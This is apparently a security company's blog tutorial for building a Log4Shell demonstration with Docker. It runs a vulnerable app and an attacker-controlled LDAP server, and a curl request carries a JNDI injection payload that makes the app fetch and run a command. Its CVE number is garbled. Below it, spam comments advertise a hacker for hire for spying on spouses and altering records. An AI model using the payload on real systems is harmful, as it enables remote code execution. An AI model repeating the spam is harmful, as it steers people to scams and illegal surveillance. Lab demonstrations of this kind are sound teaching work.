Our simple explainer of the Log4Shell (CVE-2021-4428) exploit has quickly become our most popular blog post. People really resonated with the cup of coffee analogy and we've had great feedback on the quick demonstration video.
We've had many requests on how to build your own Log4Shell demo to show internal teams. If you watch our video, it's clear you need two things: a vulnerable application and a working LDAP server under your control to deliver the exploit.
The common way to do this is to set up a demonstration in a virtual machine, however these take up huge resources and are hard to share, so let's use Docker for both systems.
The first half - the vulnerable application - is already available as a docker container.
The second half - the LDAP server - isn't, so we spent some time this morning creating one just for you! The reason we have created this container is that the original exploit has been removed and is no longer available for demonstrating the vulnerability.
For your demonstration to work you obviously need Docker running on your system. If you don't already have it, please install that now or the rest won't work. The second thing we need to do is set up a separate Docker network so the two containers can see and talk to each other. I suggest that you have three terminal screens open, one for the Application, one for the LDAP server and one for running other commands, we shall refer to this as the Command Terminal.
Copy and Paste Instructions for the Entire Demo
First, let's set up the Docker network for the demo, in the Command Terminal:
docker network create log4jnetwork
Now, let's grab and run the vulnerable application in the Application Terminal:
docker run --rm --network log4jnetwork --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
Next, run the 'ls' command in the Command Terminal on the /tmp directory of the vulnerable app, this will show us the 3 files that are in there:
docker exec vulnerable-app ls /tmp
We now need an LDAP server that is under our control and listens on two ports: 1389 and 8888. This command will grab our version of the exploit running on a alpine linux based image with JavaJRE built in, run this in the LDAP Terminal:
docker run --rm --network log4jnetwork --name log4jldapserver -p 1389:1389 -p 8888:8888 cygenta/log4jldap
Finally, we get to trigger the exploit using the command below. This will be sent to the vulnerable app which will then perform the lookup and download the exploit from the LDAP server. The exploit in this case is to create a file in the /tmp folder, so run this in the Command Terminal or a separate new terminal to simulate another machine:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://log4jldapserver:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9DeWdlbnRhRGVtbw==}'
And we obviously need to finish by looking back on the vulnerable app server to see if we managed to create the file in the /tmp folder, again run in the Command Terminal:
docker exec vulnerable-app ls /tmp
Watch my quick video walkthrough of the above steps:
One thing to check if you have any issues: please make sure that the names of containers and networks match.
In case you missed it, our original exploit demo video is here:
We would like to thank:
and https://twitter.com/DeathsPirate/ for user testing.
If you've found this blog post helpful, you may want to subscribe to our mailing list. We'd be delighted to keep in touch!
I appreciate Henry for making me realise the truth to a certified hacker who knows a lot about what he is doing. I strongly recommend you hire him because he’s the best out there and always delivers. I have referred over 10 people to him and all had positive results. He can help you hack into any devices, social networks including – Facebook, Hangout, iMessages, Twitter accounts, Snap chat , Instagram, Whatsapp, wechat, text messages ,smartphone cloning,tracking emails and also any other social media messenger or sites. It’s advisable to hire a professional hacker.Thank me later. Contact him here., Henryclarkethicalhacker@gmail.com and you can text, call and Whatsapp him on +1(201)4305865, or +1(219)7960574.....
Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. he is a cyber guru, he helps catch cheating spouses by hacking their communications like call, Facebook, text, emails, Skype, whats-app and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statement, grades and many more. he will definitely help you, he has helped a lot of people, contact him on,…
I’m excited to write about Henry Hacker, he is a great and brilliant hacker who penetrated my spouse’s phone without a physical installation app. And I was able to access my spouse’s phone, SMS, Whatsapp, Instagram, Facebook, Wechat, Snapchat, Call Logs, Kik, Twitter and all social media. The most amazing thing there is that he restores all phone deleted text messages. And I also have access to everything including the phone gallery without touching the phone.I can see the whole secret of my spouse. Contact him for any hacking service. He is also a genius in repairing Credit Score, increasing school grade, Clear Criminal Record etc. His service is fast. Contact:, Henryclarkethicalhacker@gmail.com and you can text, call him on whatsapp…
i followed all the steps above successfully but i havnet been able to exploit the vulnerability with metasploit ! is there any missing step?